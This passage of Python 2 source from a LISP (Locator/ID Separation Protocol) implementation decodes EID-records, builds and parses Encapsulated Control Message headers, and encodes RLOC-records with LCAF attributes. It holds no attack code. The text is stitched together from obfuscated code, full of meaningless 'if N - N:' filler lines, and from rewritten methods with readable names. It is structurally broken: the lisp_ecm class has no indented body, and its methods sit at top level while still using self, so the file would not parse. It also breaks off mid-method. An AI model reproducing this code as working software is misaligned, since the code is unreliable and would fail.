    if 45 - 45: ooOoO0o % I11i
    if 37 - 37: iII111i
    def decode(self, packet):
        # Parse one EID-record from 'packet'; returns the unconsumed
        # remainder or None if the buffer is too short.
        o00OooooOOOO = "IBBHHH"
        oO0o00O = struct.calcsize(o00OooooOOOO)
        if (len(packet) < oO0o00O): return(None)
        if 70 - 70: O0 + iIii1I11I1II1 % O0 * o0oOOo0O0Ooo - Oo0Ooo - ooOoO0o
        self.record_ttl, self.rloc_count, self.eid.mask_len, Ii1II1I, self.map_version, self.eid.afi = struct.unpack(o00OooooOOOO, packet[:oO0o00O])
        if 94 - 94: i1IIi + IiII / OoooooooOO - oO0o / OOooOOo / OoOoOO00
        if 55 - 55: OOooOOo
        if 5 - 5: I11i / OoOoOO00
        # Convert to host order and unpack the flags/version subfields.
        self.record_ttl = socket.ntohl(self.record_ttl)
        Ii1II1I = socket.ntohs(Ii1II1I)
        self.action = (Ii1II1I >> 13) & 0x7
        self.authoritative = True if ((Ii1II1I >> 12) & 1) else False
        self.ddt_incomplete = True if ((Ii1II1I >> 11) & 1) else False
        self.map_version = socket.ntohs(self.map_version)
        self.signature_count = self.map_version >> 12
        self.map_version = self.map_version & 0xfff
        self.eid.afi = socket.ntohs(self.eid.afi)
        self.eid.instance_id = 0
        packet = packet[oO0o00O::]
        if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
        if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
        if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
        if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
        # LCAF-encoded EID may carry an (S,G) pair; group inherits the
        # instance-id of the EID.
        if (self.eid.afi == LISP_AFI_LCAF):
            packet, oOoooOOO0o0 = self.eid.lcaf_decode_eid(packet)
            if (oOoooOOO0o0): self.group = oOoooOOO0o0
            self.group.instance_id = self.eid.instance_id
            return(packet)
        if 34 - 34: iII111i . OOooOOo
        if 13 - 13: OoO0O00 * OOooOOo + oO0o
        packet = self.eid.unpack_address(packet)
        return(packet)
    if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
    if 92 - 92: i1IIi + OoO0O00 * I11i
    def print_eid_tuple(self):
        # Display form of the (EID, group) pair.
        return(lisp_print_eid_tuple(self.eid, self.group))
if 70 - 70: Oo0Ooo
if 93 - 93: iII111i . I1ii11iIi11i . Oo0Ooo . oO0o . OoooooooOO
if 51 - 51: O0 - iII111i
if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
if 85 - 85: iII111i + OOooOOo
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if 60 - 60: I1Ii111 * iII111i / OoooooooOO * Oo0Ooo
if 47 - 47: iII111i + o0oOOo0O0Ooo % iIii1I11I1II1 * OoOoOO00
if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
# IANA protocol number for UDP, used in the inner IP header of an ECM.
LISP_UDP_PROTOCOL = 17
# Default inner-header IP TTL for Encapsulated Control Messages.
LISP_DEFAULT_ECM_TTL = 128
if 27 - 27: II111iiii + i11iIiiIii
class lisp_ecm ( ) :
def __init__(self, sport):
    """Initialize an empty Encapsulated Control Message (ECM) header.

    'sport' is the UDP source port to place in the inner UDP header;
    the destination port is always the LISP control port.
    """
    # ECM type-word flag bits, all clear by default.
    self.security = False
    self.ddt = False
    self.to_etr = False
    self.to_ms = False
    # Inner IP header fields.
    self.length = 0
    self.ttl = LISP_DEFAULT_ECM_TTL
    self.protocol = LISP_UDP_PROTOCOL
    self.ip_checksum = 0
    self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
    # Inner UDP header fields.
    self.udp_sport = sport
    self.udp_dport = LISP_CTRL_PORT
    self.udp_checksum = 0
    self.udp_length = 0
    # AFI of the inner header; set by encode()/decode().
    self.afi = LISP_AFI_NONE
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
def print_ecm(self):
    """Log a one-line summary of the ECM flags and inner IP/UDP headers."""
    I111 = ("{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}")
    s_flag = "S" if self.security else "s"
    d_flag = "D" if self.ddt else "d"
    e_flag = "E" if self.to_etr else "e"
    m_flag = "M" if self.to_ms else "m"
    inner_src = green(self.source.print_address(), False)
    inner_dst = green(self.dest.print_address(), False)
    lprint(I111.format(bold("ECM", False), s_flag, d_flag, e_flag, m_flag,
        inner_src, inner_dst, self.udp_sport, self.udp_dport))
if 66 - 66: oO0o / OOooOOo / iII111i
def encode(self, packet, inner_source, inner_dest):
    """Build the ECM encapsulation for 'packet': the LISP ECM type word,
    an inner IPv4 or IPv6 header, and an inner UDP header.  Returns the
    encapsulation headers (the caller appends 'packet' itself)."""
    # Inner UDP length covers the payload plus the 8-byte UDP header;
    # IPv4 total length additionally includes its 20-byte IP header.
    self.udp_length = len(packet) + 8
    self.source = inner_source
    self.dest = inner_dest
    if (inner_dest.is_ipv4()):
        self.afi = LISP_AFI_IPV4
        self.length = self.udp_length + 20
    if (inner_dest.is_ipv6()):
        self.afi = LISP_AFI_IPV6
        self.length = self.udp_length

    # ECM type word with the flag bits.
    type_word = (LISP_ECM << 28)
    if (self.security): type_word |= 0x08000000
    if (self.ddt): type_word |= 0x04000000
    if (self.to_etr): type_word |= 0x02000000
    if (self.to_ms): type_word |= 0x01000000
    ecm_header = struct.pack("I", socket.htonl(type_word))

    # Inner IP header for whichever family the destination uses.
    ip_header = ""
    if (self.afi == LISP_AFI_IPV4):
        ip_header = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
            0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
        ip_header += self.source.pack_address()
        ip_header += self.dest.pack_address()
        ip_header = lisp_ip_checksum(ip_header)
    if (self.afi == LISP_AFI_IPV6):
        ip_header = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
            self.protocol, self.ttl)
        ip_header += self.source.pack_address()
        ip_header += self.dest.pack_address()

    # Inner UDP header, all fields in network byte order.
    udp_header = struct.pack("HHHH", socket.htons(self.udp_sport),
        socket.htons(self.udp_dport), socket.htons(self.udp_length),
        socket.htons(self.udp_checksum))
    return(ecm_header + ip_header + udp_header)
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
def decode(self, packet):
    """Decode an Encapsulated-Control-Message header chain.

    Parses, in order: the 4-byte ECM first-long (flag bits), the inner
    IPv4 or IPv6 header, and the inner UDP header, storing the fields on
    self. Returns the remaining payload after the UDP header, or None if
    the packet is too short or an address fails to parse.
    """
    size = struct.calcsize("I")
    if (len(packet) < size): return(None)

    first_long = socket.ntohl(struct.unpack("I", packet[:size])[0])
    self.security = bool(first_long & 0x08000000)
    self.ddt = bool(first_long & 0x04000000)
    self.to_etr = bool(first_long & 0x02000000)
    self.to_ms = bool(first_long & 0x01000000)
    packet = packet[size:]

    # Peek at the IP version nibble of the inner header.
    if (len(packet) < 1): return(None)
    version = struct.unpack("B", packet[0:1])[0] >> 4

    if (version == 4):
        size = struct.calcsize("HHIBBH")
        if (len(packet) < size): return(None)

        _, length, _, ttl, proto, cksum = struct.unpack("HHIBBH",
            packet[:size])
        self.length = socket.ntohs(length)
        self.ttl = ttl
        self.protocol = proto
        self.ip_checksum = socket.ntohs(cksum)
        self.source.afi = self.dest.afi = LISP_AFI_IPV4

        # Zero the IPv4 header-checksum field in the buffer before the
        # header is stripped (NOTE(review): retained from the original;
        # presumably for later checksum verification — confirm upstream).
        cksum_offset = struct.calcsize("HHIBB")
        cksum_size = struct.calcsize("H")
        packet = packet[:cksum_offset] + struct.pack("H", 0) + \
            packet[cksum_offset + cksum_size:]

        packet = packet[size:]
        packet = self.source.unpack_address(packet)
        if (packet == None): return(None)
        packet = self.dest.unpack_address(packet)
        if (packet == None): return(None)

    if (version == 6):
        size = struct.calcsize("IHBB")
        if (len(packet) < size): return(None)

        _, length, proto, ttl = struct.unpack("IHBB", packet[:size])
        self.length = socket.ntohs(length)
        self.protocol = proto
        self.ttl = ttl
        self.source.afi = self.dest.afi = LISP_AFI_IPV6

        packet = packet[size:]
        packet = self.source.unpack_address(packet)
        if (packet == None): return(None)
        packet = self.dest.unpack_address(packet)
        if (packet == None): return(None)

    self.source.mask_len = self.source.host_mask_len()
    self.dest.mask_len = self.dest.host_mask_len()

    # Inner UDP header: source-port, dest-port, length, checksum.
    size = struct.calcsize("HHHH")
    if (len(packet) < size): return(None)

    sport, dport, ulen, ucksum = struct.unpack("HHHH", packet[:size])
    self.udp_sport = socket.ntohs(sport)
    self.udp_dport = socket.ntohs(dport)
    self.udp_length = socket.ntohs(ulen)
    self.udp_checksum = socket.ntohs(ucksum)
    return(packet[size:])
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
if 75 - 75: ooOoO0o + ooOoO0o . I1Ii111 % iII111i / iIii1I11I1II1 * iII111i
if 13 - 13: II111iiii * i11iIiiIii - i1IIi * OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if 64 - 64: II111iiii + i11iIiiIii
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if 69 - 69: iII111i * i11iIiiIii / i1IIi
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
if 74 - 74: OOooOOo
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
if 88 - 88: i11iIiiIii
if 33 - 33: OoO0O00 + O0
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
if 10 - 10: i1IIi
if 49 - 49: I1Ii111 - Ii1I . O0
if 46 - 46: OOooOOo
if 64 - 64: I1IiiI / OoOoOO00
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if 84 - 84: O0 % Ii1I
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
if 31 - 31: O0 . I1IiiI
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
class lisp_rloc_record():
    """One RLOC-record of a LISP mapping record.

    Holds the RLOC address, the unicast/multicast priority and weight
    tuples, the L/p/R flag bits, and the optional LCAF-encoded attributes:
    geo coordinates, ELP, RLE, JSON blob, security keys, and an rloc-name
    distinguished name.
    """

    def __init__(self):
        self.priority = 0          # unicast priority
        self.weight = 0            # unicast weight
        self.mpriority = 0         # multicast priority
        self.mweight = 0           # multicast weight
        self.local_bit = False     # L-bit: RLOC local to sender
        self.probe_bit = False     # p-bit: RLOC-probe reply
        self.reach_bit = False     # R-bit: RLOC reachable
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.geo = None            # lisp_geo or None
        self.elp = None            # lisp_elp or None
        self.rle = None            # lisp_rle or None
        self.json = None           # lisp_json or None
        self.rloc_name = None      # distinguished-name string or None
        self.keys = None           # [None, lisp_keys, None, None] or None

    def print_rloc_name(self, cour=False):
        """Return "rloc-name: <name>" (courier-wrapped when cour), or ""."""
        if (self.rloc_name == None): return("")
        name = self.rloc_name
        if (cour): name = lisp_print_cour(name)
        return('rloc-name: {}'.format(blue(name, cour)))

    def print_record(self, indent):
        """Log a one-line summary of this RLOC-record, prefixed by indent."""
        name_str = self.print_rloc_name()
        if (name_str != ""): name_str = ", " + name_str

        geo_str = ""
        if (self.geo):
            name = ""
            if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
            geo_str = ", geo: {}{}".format(name, self.geo.print_geo())

        elp_str = ""
        if (self.elp):
            name = ""
            if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
            elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))

        rle_str = ""
        if (self.rle):
            name = ""
            if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
            rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))

        json_str = ""
        if (self.json):
            name = ""
            if (self.json.json_name):
                name = "'{}' ".format(self.json.json_name)
            json_str = ", json: {}".format(self.json.print_json(False))

        sec_str = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            sec_str = ", " + self.keys[1].print_keys()

        fmt = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
            + "{}{}{}{}{}{}{}")
        lprint(fmt.format(indent, self.print_flags(), self.priority,
            self.weight, self.mpriority, self.mweight, self.rloc.afi,
            red(self.rloc.print_address_no_iid(), False), name_str, geo_str,
            elp_str, rle_str, json_str, sec_str))

    def print_flags(self):
        """Return the flag bits as "LpR"-style letters (upper = set)."""
        local = "L" if self.local_bit else "l"
        probe = "P" if self.probe_bit else "p"
        reach = "R" if self.reach_bit else "r"
        return("{}{}{}".format(local, probe, reach))

    def store_rloc_entry(self, rloc_entry):
        """Copy configured state from rloc_entry into this record.

        Prefers the translated (NATed) RLOC address when one is present.
        Named geo/elp/rle/json attributes fall back to lookups in the
        module-level configuration tables.
        """
        address = rloc_entry.translated_rloc
        if (address.is_null()): address = rloc_entry.rloc
        self.rloc.copy_address(address)

        if (rloc_entry.rloc_name):
            self.rloc_name = rloc_entry.rloc_name

        if (rloc_entry.geo):
            self.geo = rloc_entry.geo
        else:
            name = rloc_entry.geo_name
            if (name and lisp_geo_list.has_key(name)):
                self.geo = lisp_geo_list[name]

        if (rloc_entry.elp):
            self.elp = rloc_entry.elp
        else:
            name = rloc_entry.elp_name
            if (name and lisp_elp_list.has_key(name)):
                self.elp = lisp_elp_list[name]

        if (rloc_entry.rle):
            self.rle = rloc_entry.rle
        else:
            name = rloc_entry.rle_name
            if (name and lisp_rle_list.has_key(name)):
                self.rle = lisp_rle_list[name]

        if (rloc_entry.json):
            self.json = rloc_entry.json
        else:
            name = rloc_entry.json_name
            if (name and lisp_json_list.has_key(name)):
                self.json = lisp_json_list[name]

        self.priority = rloc_entry.priority
        self.weight = rloc_entry.weight
        self.mpriority = rloc_entry.mpriority
        self.mweight = rloc_entry.mweight

    def encode_lcaf(self):
        """Encode this record's RLOC and attributes as an AFI-List LCAF.

        Builds the optional geo/ELP/RLE/JSON/security/rloc-name sub-LCAFs
        and wraps them, together with the RLOC address, in an AFI-List
        LCAF. Returns the packed string.
        """
        lcaf_afi = socket.htons(LISP_AFI_LCAF)

        geo_lcaf = ""
        if (self.geo):
            geo_lcaf = self.geo.encode_geo()

        elp_lcaf = ""
        if (self.elp):
            elp_nodes = ""
            for elp_node in self.elp.elp_nodes:
                afi = socket.htons(elp_node.address.afi)
                flags = 0
                if (elp_node.eid): flags |= 0x4
                if (elp_node.probe): flags |= 0x2
                if (elp_node.strict): flags |= 0x1
                flags = socket.htons(flags)
                elp_nodes += struct.pack("HH", flags, afi)
                elp_nodes += elp_node.address.pack_address()

            elp_len = socket.htons(len(elp_nodes))
            elp_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_ELP_TYPE, 0, elp_len)
            elp_lcaf += elp_nodes

        rle_lcaf = ""
        if (self.rle):
            rle_nodes = ""
            for rle_node in self.rle.rle_nodes:
                afi = socket.htons(rle_node.address.afi)
                rle_nodes += struct.pack("HBBH", 0, 0, rle_node.level, afi)
                rle_nodes += rle_node.address.pack_address()
                if (rle_node.rloc_name):
                    rle_nodes += struct.pack("H", socket.htons(LISP_AFI_NAME))
                    rle_nodes += rle_node.rloc_name + "\0"

            rle_len = socket.htons(len(rle_nodes))
            rle_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_RLE_TYPE, 0, rle_len)
            rle_lcaf += rle_nodes

        json_lcaf = ""
        if (self.json):
            # LCAF length covers the 2-byte json-length field plus string.
            lcaf_len = socket.htons(len(self.json.json_string) + 2)
            json_len = socket.htons(len(self.json.json_string))
            json_lcaf = struct.pack("HBBBBHH", lcaf_afi, 0, 0,
                LISP_LCAF_JSON_TYPE, 0, lcaf_len, json_len)
            json_lcaf += self.json.json_string
            json_lcaf += struct.pack("H", 0)

        sec_lcaf = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            sec_lcaf = self.keys[1].encode_lcaf(self.rloc)

        name_field = ""
        if (self.rloc_name):
            name_field += struct.pack("H", socket.htons(LISP_AFI_NAME))
            name_field += self.rloc_name + "\0"

        # AFI-List payload length: all sub-LCAFs plus the 2-byte RLOC AFI
        # and the RLOC address itself.
        total_len = len(geo_lcaf) + len(elp_lcaf) + len(rle_lcaf) + \
            len(sec_lcaf) + 2 + len(json_lcaf) + self.rloc.addr_length() + \
            len(name_field)
        total_len = socket.htons(total_len)

        lcaf = struct.pack("HBBBBHH", lcaf_afi, 0, 0,
            LISP_LCAF_AFI_LIST_TYPE, 0, total_len,
            socket.htons(self.rloc.afi))
        lcaf += self.rloc.pack_address()
        return(lcaf + name_field + geo_lcaf + elp_lcaf + rle_lcaf +
            sec_lcaf + json_lcaf)

    def encode(self):
        """Pack this RLOC-record for the wire.

        Uses a plain AFI-encoded address when no LCAF attributes are
        present; otherwise replaces the AFI field with an LCAF encoding.
        """
        flags = 0
        if (self.local_bit): flags |= 0x0004
        if (self.probe_bit): flags |= 0x0002
        if (self.reach_bit): flags |= 0x0001

        record = struct.pack("BBBBHH", self.priority, self.weight,
            self.mpriority, self.mweight, socket.htons(flags),
            socket.htons(self.rloc.afi))

        if (self.geo or self.elp or self.rle or self.keys or
            self.rloc_name or self.json):
            # Strip the just-packed AFI; encode_lcaf() supplies its own.
            record = record[0:-2] + self.encode_lcaf()
        else:
            record += self.rloc.pack_address()
        return(record)

    def decode_lcaf(self, packet, nonce):
        """Decode one LCAF from packet into this record.

        Handles AFI-List (possibly recursive), Geo-Coord, JSON, ELP, RLE,
        and Security LCAF types; unknown types are skipped. Returns the
        remaining packet or None on a parse failure.
        """
        fmt = "HBBBBH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return(None)

        afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = struct.unpack(fmt,
            packet[:size])

        lcaf_len = socket.ntohs(lcaf_len)
        packet = packet[size:]
        if (lcaf_len > len(packet)): return(None)

        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):

            #
            # Walk each AFI-encoded entry; an entry may itself be an LCAF.
            #
            while (lcaf_len > 0):
                fmt = "H"
                size = struct.calcsize(fmt)
                if (lcaf_len < size): return(None)

                bytes_before = len(packet)
                afi = socket.ntohs(struct.unpack(fmt, packet[:size])[0])

                if (afi == LISP_AFI_LCAF):
                    packet = self.decode_lcaf(packet, nonce)
                    if (packet == None): return(None)
                else:
                    packet = packet[size:]
                    self.rloc_name = None
                    if (afi == LISP_AFI_NAME):
                        packet, name = lisp_decode_dist_name(packet)
                        self.rloc_name = name
                    else:
                        self.rloc.afi = afi
                        packet = self.rloc.unpack_address(packet)
                        if (packet == None): return(None)
                        self.rloc.mask_len = self.rloc.host_mask_len()

                lcaf_len -= bytes_before - len(packet)

        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):

            #
            # Geo-coordinates; rsvd2 carries flag bits for decode_geo().
            #
            geo = lisp_geo("")
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            if (packet == None): return(None)
            self.geo = geo

        elif (lcaf_type == LISP_LCAF_JSON_TYPE):

            #
            # JSON string preceded by a 2-byte length.
            #
            fmt = "H"
            size = struct.calcsize(fmt)
            if (lcaf_len < size): return(None)

            json_len = socket.ntohs(struct.unpack(fmt, packet[:size])[0])
            if (lcaf_len < size + json_len): return(None)

            packet = packet[size:]
            self.json = lisp_json("", packet[0:json_len])
            packet = packet[json_len:]

        elif (lcaf_type == LISP_LCAF_ELP_TYPE):

            #
            # Explicit Locator Path: a list of flag/AFI/address hops.
            #
            elp = lisp_elp(None)
            elp.elp_nodes = []
            while (lcaf_len > 0):
                flags, afi = struct.unpack("HH", packet[:4])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                elp_node = lisp_elp_node()
                elp.elp_nodes.append(elp_node)

                flags = socket.ntohs(flags)
                elp_node.eid = (flags & 0x4)
                elp_node.probe = (flags & 0x2)
                elp_node.strict = (flags & 0x1)
                elp_node.address.afi = afi
                elp_node.address.mask_len = elp_node.address.host_mask_len()
                packet = elp_node.address.unpack_address(packet[4:])
                lcaf_len -= elp_node.address.addr_length() + 4

            elp.select_elp_node()
            self.elp = elp

        elif (lcaf_type == LISP_LCAF_RLE_TYPE):

            #
            # Replication List Entry: level/AFI/address nodes, each with
            # an optional trailing distinguished rloc-name.
            #
            rle = lisp_rle(None)
            rle.rle_nodes = []
            while (lcaf_len > 0):
                x, rsvd, level, afi = struct.unpack("HBBH", packet[:6])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                rle_node = lisp_rle_node()
                rle.rle_nodes.append(rle_node)

                rle_node.level = level
                rle_node.address.afi = afi
                rle_node.address.mask_len = rle_node.address.host_mask_len()
                packet = rle_node.address.unpack_address(packet[6:])

                lcaf_len -= rle_node.address.addr_length() + 6
                if (lcaf_len >= 2):
                    afi = struct.unpack("H", packet[:2])[0]
                    if (socket.ntohs(afi) == LISP_AFI_NAME):
                        packet = packet[2:]
                        packet, rle_node.rloc_name = \
                            lisp_decode_dist_name(packet)
                        if (packet == None): return(None)
                        lcaf_len -= len(rle_node.rloc_name) + 1 + 2

            self.rle = rle
            self.rle.build_forwarding_list()

        elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):

            #
            # Security keys. First probe the cipher-suite, then re-decode
            # with a lisp_keys instance built for that suite.
            #
            orig_packet = packet
            cs_probe = lisp_keys(1)
            packet = cs_probe.decode_lcaf(orig_packet, lcaf_len)
            if (packet == None): return(None)

